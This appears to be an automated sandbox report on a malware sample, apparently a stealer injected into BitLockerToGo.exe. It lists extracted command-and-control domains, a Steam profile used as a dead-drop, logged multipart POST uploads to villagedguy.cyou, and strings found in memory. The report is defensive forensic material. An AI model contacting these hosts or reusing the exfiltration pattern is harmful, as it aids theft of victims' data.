              Source: Malware configuration extractorURLs: sidercotay.sbs
              Source: Malware configuration extractorURLs: deepymouthi.sbs
              Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
              Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: villagedguy.cyou
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 75 | Host: villagedguy.cyou
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 18159 | Host: villagedguy.cyou
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8780 | Host: villagedguy.cyou
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20433 | Host: villagedguy.cyou
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 3802 | Host: villagedguy.cyou
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 3818 | Host: villagedguy.cyou
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1249 | Host: villagedguy.cyou
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1117 | Host: villagedguy.cyou
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (10 occurrences)
              Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
              Source: global traffic | DNS traffic detected: DNS query: deepymouthi.sbs
              Source: global traffic | DNS traffic detected: DNS query: monstourtu.sbs
              Source: global traffic | DNS traffic detected: DNS query: heroicmint.sbs
              Source: global traffic | DNS traffic detected: DNS query: sidercotay.sbs
              Source: global traffic | DNS traffic detected: DNS query: captaitwik.sbs
              Source: global traffic | DNS traffic detected: DNS query: wrigglesight.sbs
              Source: global traffic | DNS traffic detected: DNS query: ferrycheatyk.sbs
              Source: global traffic | DNS traffic detected: DNS query: snailyeductyi.sbs
              Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
              Source: global traffic | DNS traffic detected: DNS query: villagedguy.cyou
              Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: villagedguy.cyou
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:27060
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dll | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dll | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: BitLockerToGo.exe, 00000002.00000003.1952377971.0000000005060000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: BitLockerToGo.exe, 00000002.00000003.1952377971.0000000005060000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dll | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dll | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dll | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: BitLockerToGo.exe, 00000002.00000003.1952377971.0000000005060000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dll | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dll | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
              Source: BitLockerToGo.exe, 00000002.00000003.1952377971.0000000005060000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: BitLockerToGo.exe, 00000002.00000003.1952377971.0000000005060000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dll | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dll | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dll | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dll | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: BitLockerToGo.exe, 00000002.00000003.1952377971.0000000005060000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dll | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
              Source: BitLockerToGo.exe, 00000002.00000003.1952377971.0000000005060000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: BitLockerToGo.exe, 00000002.00000003.1952377971.0000000005060000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dll | String found in binary or memory: http://ocsp.digicert.com0A
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dll | String found in binary or memory: http://ocsp.digicert.com0C
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dll | String found in binary or memory: http://ocsp.digicert.com0N
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dll | String found in binary or memory: http://ocsp.digicert.com0X
              Source: BitLockerToGo.exe, 00000002.00000003.1952377971.0000000005060000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/privacy_agreement/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
              Source: Qt5GuiVBox.dll | String found in binary or memory: http://www.aiim.org/pdfa/ns/id/
              Source: Qt5GuiVBox.dll | String found in binary or memory: http://www.color.org)
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dll | String found in binary or memory: http://www.digicert.com/CPS0
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.valvesoftware.com/legal.htm
              Source: BitLockerToGo.exe, 00000002.00000003.1952377971.0000000005060000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
              Source: BitLockerToGo.exe, 00000002.00000003.1952377971.0000000005060000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
              Source: BitLockerToGo.exe, 00000002.00000003.1925016440.0000000005079000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.steampowered.com/
              Source: Imperial_Delay.exe | String found in binary or memory: https://api.zitadel.ch/assets/v1/avatar-32432jkh4kj32
              Source: BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://broadcast.st.dl.eccdnx.com
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
              Source: BitLockerToGo.exe, 00000002.00000003.1925016440.0000000005079000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: BitLockerToGo.exe, 00000002.00000003.1925016440.0000000005079000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: BitLockerToGo.exe, 00000002.00000003.1925016440.0000000005079000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://checkout.steampowered.com/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/
              Source: BitLockerToGo.exe, 00000002.00000002.2038770877.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/communit
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=ljhW-PbGuX
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&amp;l=english&am
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&amp;l=engli
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1&amp;
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&amp;l=en
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=xYs7
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=bOP7RorZq4_W&amp;l=englis
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=UuGFpt56D9L4&amp;l=
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=KkhJqW2NGKiM&amp;l=engli
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=I6RUPT-G-voT&amp
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=engl
              Source: BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Ff_1prscqzeu&amp;
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
              Source: BitLockerToGo.exe, 00000002.00000003.1925016440.0000000005079000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: BitLockerToGo.exe, 00000002.00000003.1925016440.0000000005079000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: BitLockerToGo.exe, 00000002.00000003.1925016440.0000000005079000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: Imperial_Delay.exe | String found in binary or memory: https://github.com/golang/protobuf/issues/1609):
              Source: Imperial_Delay.exe | String found in binary or memory: https://github.com/zitadel/zitadel/blob/new-eventstore/cmd/zitadel/startup.yaml.
              Source: libidn2-0.dll.0.dr | String found in binary or memory: https://gnu.org/licenses/gpl.html
              Source: libidn2-0.dll.0.dr | String found in binary or memory: https://gnu.org/licenses/gpl.htmlWritten
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.com/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.com/en/
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.steampowered.com/
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lv.queniujq.cn
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://medal.tv
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://player.vimeo.com
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://recaptcha.net
